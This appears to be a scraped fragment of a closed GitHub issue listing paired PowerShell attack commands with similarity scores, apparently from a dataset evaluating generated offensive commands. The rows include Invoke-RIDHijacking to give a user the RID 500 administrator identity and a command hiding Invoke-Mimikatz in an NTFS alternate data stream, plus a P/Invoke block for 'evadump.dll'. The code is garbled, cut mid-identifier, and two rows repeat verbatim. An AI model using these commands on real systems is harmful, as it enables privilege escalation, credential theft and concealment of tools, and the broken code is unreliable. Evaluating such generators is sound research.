Closed cridin1 closed 9 months ago
8 command1: Invoke-RIDHijacking -User unina -RID 500 command2: Invoke-RIDHijacking -User unina -RID 500 0.13 3 41 4
30 command1: $stream = Get-Stream -Name 'evadump' ; Add-Type -TypeDefinition @' using System; using System.Runtime.InteropServices; public class EventStream { [DllImport('evadump.dll')] public statienStream(IntPtr hWndNewOwner); [DllImport('evadump.dll')] public static extern bool CloseStream(); [DllImport('evadump.dll')] public static extern IntPtr GetData(uint uFormat); [DllImport('evadum static extern IntPtr GlobalLock(IntPtr hMem); [DllImport('evadump.dll')] public static extern bool GlobalUnlock(IntPtr hMem); [DllImport('evadump.dll')] public static extern int GlobalSize(IntPtrream.OpenStream([IntPtr]::Zero) $stream.CloseStream() command2: $content = 'Invoke-Mimikatz'; $file = 'C:\normal.txt'; $stream = 'C:\normal.txt:hidden'; Set-Content -Path $file -Value 'This is a normal file'; Add-Content -Path $stream -Value $contenPath $stream 0.93 51 57 53
8 command1: Invoke-RIDHijacking -User unina -RID 500 command2: Invoke-RIDHijacking -User unina -RID 500 0.13 3 41 4
30 command1: $stream = Get-Stream -Name 'evadump' ; Add-Type -TypeDefinition @' using System; using System.Runtime.InteropServices; public class EventStream { [DllImport('evadump.dll')] public statienStream(IntPtr hWndNewOwner); [DllImport('evadump.dll')] public static extern bool CloseStream(); [DllImport('evadump.dll')] public static extern IntPtr GetData(uint uFormat); [DllImport('evadum static extern IntPtr GlobalLock(IntPtr hMem); [DllImport('evadump.dll')] public static extern bool GlobalUnlock(IntPtr hMem); [DllImport('evadump.dll')] public static extern int GlobalSize(IntPtrream.OpenStream([IntPtr]::Zero) $stream.CloseStream() command2: $content = 'Invoke-Mimikatz'; $file = 'C:\normal.txt'; $stream = 'C:\normal.txt:hidden'; Set-Content -Path $file -Value 'This is a normal file'; Add-Content -Path $stream -Value $contenPath $stream 0.93 51 57 53